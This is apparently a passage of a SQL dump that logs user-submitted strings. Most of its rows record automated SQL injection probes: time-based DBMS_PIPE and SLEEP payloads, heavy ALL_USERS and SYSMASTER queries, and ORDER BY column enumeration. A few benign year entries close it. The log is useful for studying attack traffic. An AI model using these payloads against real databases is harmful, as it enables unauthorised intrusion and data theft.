(2145, 1, 1, 'fJTD\')/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/(\'DIaw\'/**/LIKE/**/\'DIaw', 0, '2024-10-24 19:48:09'),
(2146, 1, 1, 'fJTD%\'/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/\'BsVj%\'=\'BsVj', 0, '2024-10-24 19:48:10'),
(2147, 1, 1, 'fJTD\'/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/\'aCwg\'/**/LIKE/**/\'aCwg', 0, '2024-10-24 19:48:12'),
(2148, 1, 1, 'fJTD\")/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/(\"xMFP\"=\"xMFP', 0, '2024-10-24 19:48:13'),
(2149, 1, 1, 'fJTD\"/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/\"aWAt\"=\"aWAt', 0, '2024-10-24 19:48:14'),
(2150, 1, 1, 'fJTD)/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/(6628/**/BETWEEN/**/6628/**/AND/**/6628', 0, '2024-10-24 19:48:16'),
(2151, 1, 1, 'fJTD))/**/AND/**/2211=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)/**/AND/**/((2752/**/BETWEEN/**/2752/**/AND/**/2752', 0, '2024-10-24 19:48:17'),
(2152, 1, 1, 'fJTD/**/AND/**/2211/**/BETWEEN/**/DBMS_PIPE/**/AND/**/DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)', 0, '2024-10-24 19:48:19'),
(2153, 1, 1, 'fJTD/**/AND/**/2211/**/BETWEEN/**/DBMS_PIPE/**/AND/**/DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(77)||CHR(74)||CHR(117),5)--/**/pPak', 0, '2024-10-24 19:48:20'),
(2154, 1, 1, 'fJTD\')/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/(\'RddO\'=\'RddO', 0, '2024-10-24 19:48:21'),
(2155, 1, 1, 'fJTD\'))/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/((\'peXA\'=\'peXA', 0, '2024-10-24 19:48:23'),
(2156, 1, 1, 'fJTD\'/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/\'bFWD\'=\'bFWD', 0, '2024-10-24 19:48:24'),
(2157, 1, 1, 'fJTD\')/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/(\'XNso\'/**/LIKE/**/\'XNso', 0, '2024-10-24 19:48:26'),
(2158, 1, 1, 'fJTD%\'/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/\'ZLnC%\'=\'ZLnC', 0, '2024-10-24 19:48:27'),
(2159, 1, 1, 'fJTD\'/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/\'LDts\'/**/LIKE/**/\'LDts', 0, '2024-10-24 19:48:29'),
(2160, 1, 1, 'fJTD\")/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/(\"hMZv\"=\"hMZv', 0, '2024-10-24 19:48:31'),
(2161, 1, 1, 'fJTD\"/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/\"FdYo\"=\"FdYo', 0, '2024-10-24 19:48:32'),
(2162, 1, 1, 'fJTD)/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/(6840/**/BETWEEN/**/6840/**/AND/**/6840', 0, '2024-10-24 19:48:34'),
(2163, 1, 1, 'fJTD))/**/OR/**/2147=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)/**/AND/**/((5269/**/BETWEEN/**/5269/**/AND/**/5269', 0, '2024-10-24 19:48:36'),
(2164, 1, 1, 'fJTD/**/OR/**/2147/**/BETWEEN/**/DBMS_PIPE/**/AND/**/DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)', 0, '2024-10-24 19:48:37'),
(2165, 1, 1, 'fJTD/**/OR/**/2147/**/BETWEEN/**/DBMS_PIPE/**/AND/**/DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(71)||CHR(104)||CHR(71),5)--/**/kkmA', 0, '2024-10-24 19:48:39'),
(2166, 1, 1, 'fJTD\')/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\'mqbb\'=\'mqbb', 0, '2024-10-24 19:48:41'),
(2167, 1, 1, 'fJTD\'))/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/((\'HHxc\'=\'HHxc', 0, '2024-10-24 19:48:42'),
(2168, 1, 1, 'fJTD\'/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'eUaE\'=\'eUaE', 0, '2024-10-24 19:48:43'),
(2169, 1, 1, 'fJTD\')/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\'VJBh\'/**/LIKE/**/\'VJBh', 0, '2024-10-24 19:48:45'),
(2170, 1, 1, 'fJTD%\'/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'apcn%\'=\'apcn', 0, '2024-10-24 19:48:46'),
(2171, 1, 1, 'fJTD\'/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'gaDv\'/**/LIKE/**/\'gaDv', 0, '2024-10-24 19:48:47'),
(2172, 1, 1, 'fJTD\")/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\"EzFv\"=\"EzFv', 0, '2024-10-24 19:48:49'),
(2173, 1, 1, 'fJTD\"/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\"uhVT\"=\"uhVT', 0, '2024-10-24 19:48:50'),
(2174, 1, 1, 'fJTD)/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(7414/**/BETWEEN/**/7414/**/AND/**/7414', 0, '2024-10-24 19:48:51'),
(2175, 1, 1, 'fJTD))/**/AND/**/7378=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/((2703/**/BETWEEN/**/2703/**/AND/**/2703', 0, '2024-10-24 19:48:53'),
(2176, 1, 1, 'fJTD/**/AND/**/7378/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)', 0, '2024-10-24 19:48:54'),
(2177, 1, 1, 'fJTD/**/AND/**/7378/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)--/**/XsUN', 0, '2024-10-24 19:48:55'),
(2178, 1, 1, 'fJTD\')/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\'nIAD\'=\'nIAD', 0, '2024-10-24 19:48:57'),
(2179, 1, 1, 'fJTD\'))/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/((\'rHyq\'=\'rHyq', 0, '2024-10-24 19:48:58'),
(2180, 1, 1, 'fJTD\'/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'Aiox\'=\'Aiox', 0, '2024-10-24 19:49:00'),
(2181, 1, 1, 'fJTD\')/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\'dSHB\'/**/LIKE/**/\'dSHB', 0, '2024-10-24 19:49:02'),
(2182, 1, 1, 'fJTD%\'/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'YvhS%\'=\'YvhS', 0, '2024-10-24 19:49:04'),
(2183, 1, 1, 'fJTD\'/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\'iJrZ\'/**/LIKE/**/\'iJrZ', 0, '2024-10-24 19:49:05'),
(2184, 1, 1, 'fJTD\")/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(\"Hdup\"=\"Hdup', 0, '2024-10-24 19:49:07'),
(2185, 1, 1, 'fJTD\"/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/\"lUin\"=\"lUin', 0, '2024-10-24 19:49:08'),
(2186, 1, 1, 'fJTD)/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/(4272/**/BETWEEN/**/4272/**/AND/**/4272', 0, '2024-10-24 19:49:10'),
(2187, 1, 1, 'fJTD))/**/OR/**/9593=(SELECT/**/COUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)/**/AND/**/((7962/**/BETWEEN/**/7962/**/AND/**/7962', 0, '2024-10-24 19:49:11'),
(2188, 1, 1, 'fJTD/**/OR/**/9593/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)', 0, '2024-10-24 19:49:13'),
(2189, 1, 1, 'fJTD/**/OR/**/9593/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/ALL_USERS/**/T1,ALL_USERS/**/T2,ALL_USERS/**/T3,ALL_USERS/**/T4,ALL_USERS/**/T5)--/**/gmkx', 0, '2024-10-24 19:49:14'),
(2190, 1, 1, 'fJTD\')/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\'xAwv\'=\'xAwv', 0, '2024-10-24 19:49:16'),
(2191, 1, 1, 'fJTD\'))/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/((\'aEqt\'=\'aEqt', 0, '2024-10-24 19:49:17'),
(2192, 1, 1, 'fJTD\'/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'guQu\'=\'guQu', 0, '2024-10-24 19:49:18'),
(2193, 1, 1, 'fJTD\')/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\'ityv\'/**/LIKE/**/\'ityv', 0, '2024-10-24 19:49:19'),
(2194, 1, 1, 'fJTD%\'/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'gKuq%\'=\'gKuq', 0, '2024-10-24 19:49:21'),
(2195, 1, 1, 'fJTD\'/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'nZQi\'/**/LIKE/**/\'nZQi', 0, '2024-10-24 19:49:22'),
(2196, 1, 1, 'fJTD\")/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\"wDzv\"=\"wDzv', 0, '2024-10-24 19:49:23'),
(2197, 1, 1, 'fJTD\"/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\"FkSa\"=\"FkSa', 0, '2024-10-24 19:49:25'),
(2198, 1, 1, 'fJTD)/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(6291/**/BETWEEN/**/6291/**/AND/**/6291', 0, '2024-10-24 19:49:26'),
(2199, 1, 1, 'fJTD))/**/AND/**/5200=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/((9608/**/BETWEEN/**/9608/**/AND/**/9608', 0, '2024-10-24 19:49:27'),
(2200, 1, 1, 'fJTD/**/AND/**/5200/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)', 0, '2024-10-24 19:49:29'),
(2201, 1, 1, 'fJTD/**/AND/**/5200/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)--/**/qYYy', 0, '2024-10-24 19:49:31'),
(2202, 1, 1, 'fJTD\')/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\'rllp\'=\'rllp', 0, '2024-10-24 19:49:32'),
(2203, 1, 1, 'fJTD\'))/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/((\'aejC\'=\'aejC', 0, '2024-10-24 19:49:34'),
(2204, 1, 1, 'fJTD\'/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'ZkRa\'=\'ZkRa', 0, '2024-10-24 19:49:35'),
(2205, 1, 1, 'fJTD\')/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\'uHCt\'/**/LIKE/**/\'uHCt', 0, '2024-10-24 19:49:37'),
(2206, 1, 1, 'fJTD%\'/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'ccuV%\'=\'ccuV', 0, '2024-10-24 19:49:38'),
(2207, 1, 1, 'fJTD\'/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\'jmRu\'/**/LIKE/**/\'jmRu', 0, '2024-10-24 19:49:40'),
(2208, 1, 1, 'fJTD\")/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(\"Oecf\"=\"Oecf', 0, '2024-10-24 19:49:41'),
(2209, 1, 1, 'fJTD\"/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/\"PnnL\"=\"PnnL', 0, '2024-10-24 19:49:43'),
(2210, 1, 1, 'fJTD)/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/(3776/**/BETWEEN/**/3776/**/AND/**/3776', 0, '2024-10-24 19:49:44'),
(2211, 1, 1, 'fJTD))/**/OR/**/1909=(SELECT/**/COUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)/**/AND/**/((6885/**/BETWEEN/**/6885/**/AND/**/6885', 0, '2024-10-24 19:49:46'),
(2212, 1, 1, 'fJTD/**/OR/**/1909/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)', 0, '2024-10-24 19:49:48'),
(2213, 1, 1, 'fJTD/**/OR/**/1909/**/BETWEEN/**/(SELECT/**/AND/**/(SELECTCOUNT(*)/**/FROM/**/SYSMASTER:SYSPAGHDR)--/**/EdCl', 0, '2024-10-24 19:49:49'),
(2214, 1, 1, '(CASE/**/WHEN/**/(4947=4947)/**/THEN/**/SLEEP(5)/**/ELSE/**/4947/**/END)', 1, '2024-10-24 19:49:51'),
(2215, 1, 1, '-7958\')/**/ORDER/**/BY/**/1--/**/hZIi', 0, '2024-10-24 19:49:52'),
(2216, 1, 1, '-8175\')/**/ORDER/**/BY/**/3710--/**/KIFn', 0, '2024-10-24 19:49:53'),
(2217, 1, 1, '-4204\'))/**/ORDER/**/BY/**/1--/**/UcZm', 0, '2024-10-24 19:49:55'),
(2218, 1, 1, '-7112\'))/**/ORDER/**/BY/**/6262--/**/ObRw', 0, '2024-10-24 19:49:56'),
(2219, 1, 1, '-5810\'/**/ORDER/**/BY/**/1--/**/Ujbn', 0, '2024-10-24 19:49:59'),
(2220, 1, 1, '-2468\'/**/ORDER/**/BY/**/5405--/**/AVtj', 0, '2024-10-24 19:50:02'),
(2221, 1, 1, '-2179\')/**/ORDER/**/BY/**/1--/**/ybPG', 0, '2024-10-24 19:50:04'),
(2222, 1, 1, '-4039\')/**/ORDER/**/BY/**/9403--/**/zOnR', 0, '2024-10-24 19:50:05'),
(2223, 1, 1, '-9068%\'/**/ORDER/**/BY/**/1--/**/tcSD', 0, '2024-10-24 19:50:07'),
(2224, 1, 1, '-6725%\'/**/ORDER/**/BY/**/5617--/**/IyWw', 0, '2024-10-24 19:50:08'),
(2225, 1, 1, '-1598\'/**/ORDER/**/BY/**/1--/**/RfqZ', 0, '2024-10-24 19:50:09'),
(2226, 1, 1, '-6631\'/**/ORDER/**/BY/**/6306--/**/OpeR', 0, '2024-10-24 19:50:11'),
(2227, 1, 1, '-6283\")/**/ORDER/**/BY/**/1--/**/rGJZ', 0, '2024-10-24 19:50:13'),
(2228, 1, 1, '-4852\")/**/ORDER/**/BY/**/8563--/**/xxDJ', 0, '2024-10-24 19:50:14'),
(2229, 1, 1, '-7639\"/**/ORDER/**/BY/**/1--/**/ByIT', 0, '2024-10-24 19:50:16'),
(2230, 1, 1, '-1474\"/**/ORDER/**/BY/**/2962--/**/PDaD', 0, '2024-10-24 19:50:17'),
(2231, 1, 1, '-3830)/**/ORDER/**/BY/**/1--/**/tYed', 0, '2024-10-24 19:50:19'),
(2232, 1, 1, '-2107)/**/ORDER/**/BY/**/5888--/**/lnen', 0, '2024-10-24 19:50:20'),
(2233, 1, 1, '-4301))/**/ORDER/**/BY/**/1--/**/WigP', 0, '2024-10-24 19:50:22'),
(2234, 1, 1, '-1215))/**/ORDER/**/BY/**/2710--/**/Pjvl', 0, '2024-10-24 19:50:23'),
(2235, 1, 1, '-8525/**/ORDER/**/BY/**/1--/**/bBfP', 0, '2024-10-24 19:50:25'),
(2236, 1, 1, '-3163/**/ORDER/**/BY/**/5668--/**/fdFM', 0, '2024-10-24 19:50:26'),
(2237, 1, 1, '-8622/**/ORDER/**/BY/**/1--/**/EuMU', 0, '2024-10-24 19:50:28'),
(2238, 1, 1, '-4108/**/ORDER/**/BY/**/1889--/**/TmrQ', 0, '2024-10-24 19:50:29'),
(2239, 1, 1, '-1665\')/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:31'),
(2240, 1, 1, '-3932\')/**/ORDER/**/BY/**/9306#', 0, '2024-10-24 19:50:33'),
(2241, 1, 1, '-9040\'))/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:35'),
(2242, 1, 1, '-1116\'))/**/ORDER/**/BY/**/7339#', 0, '2024-10-24 19:50:36'),
(2243, 1, 1, '-1894\'/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:38'),
(2244, 1, 1, '-3101\'/**/ORDER/**/BY/**/8298#', 0, '2024-10-24 19:50:39'),
(2245, 1, 1, '-7153\')/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:41'),
(2246, 1, 1, '-7444\')/**/ORDER/**/BY/**/2111#', 0, '2024-10-24 19:50:42'),
(2247, 1, 1, '-3082%\'/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:47'),
(2248, 1, 1, '-4123%\'/**/ORDER/**/BY/**/6133#', 0, '2024-10-24 19:50:48'),
(2249, 1, 1, '-6433\'/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:50'),
(2250, 1, 1, '-1389\'/**/ORDER/**/BY/**/8538#', 0, '2024-10-24 19:50:51'),
(2251, 1, 1, '-3785\")/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:53'),
(2252, 1, 1, '-3219\")/**/ORDER/**/BY/**/9028#', 0, '2024-10-24 19:50:54'),
(2253, 1, 1, '-3132\"/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:56'),
(2254, 1, 1, '-5803\"/**/ORDER/**/BY/**/1421#', 0, '2024-10-24 19:50:57'),
(2255, 1, 1, '-5073)/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:50:59'),
(2256, 1, 1, '-5790)/**/ORDER/**/BY/**/3151#', 0, '2024-10-24 19:51:00'),
(2257, 1, 1, '-9327))/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:51:02'),
(2258, 1, 1, '-2446))/**/ORDER/**/BY/**/2568#', 0, '2024-10-24 19:51:05'),
(2259, 1, 1, '-4355/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:51:06'),
(2260, 1, 1, '-1385/**/ORDER/**/BY/**/6784#', 0, '2024-10-24 19:51:07'),
(2261, 1, 1, '-2970/**/ORDER/**/BY/**/1#', 0, '2024-10-24 19:51:09'),
(2262, 1, 1, '-8238/**/ORDER/**/BY/**/5727#', 0, '2024-10-24 19:51:11'),
(2263, 1, 1, '2024', 0, '2024-10-29 04:44:14'),
(2264, 1, 1, '2024', 0, '2024-11-06 03:11:40'),
(2265, 1, 1, '2024', 0, '2024-11-09 19:47:17'),
(2266, 1, 1, '2025', 0, '2024-11-11 15:04:24'),
(2267, 1, 1, '2024', 0, '2024-11-12 04:13:17'),
(2268, 1, 1, '2024', 0, '2024-11-15 00:45:59'),
(2269, 1, 1, '2024', 0, '2024-11-15 11:38:51'),
(2270, 1, 1, '2025', 0, '2024-11-17 05:55:51'),
(2271, 1, 1, '2024', 0, '2024-11-20 07:55:52'),
(2272, 1, 1, '2024', 0, '2024-11-23 02:18:38'),
(2273, 1, 1, '2025', 0, '2024-11-25 16:21:09'),
(2274, 1, 1, '2024', 0, '2026-01-30 20:59:42'),
(2275, 1, 1, '2023', 0, '2026-02-14 19:56:19');

-- --------------------------------------------------------

--
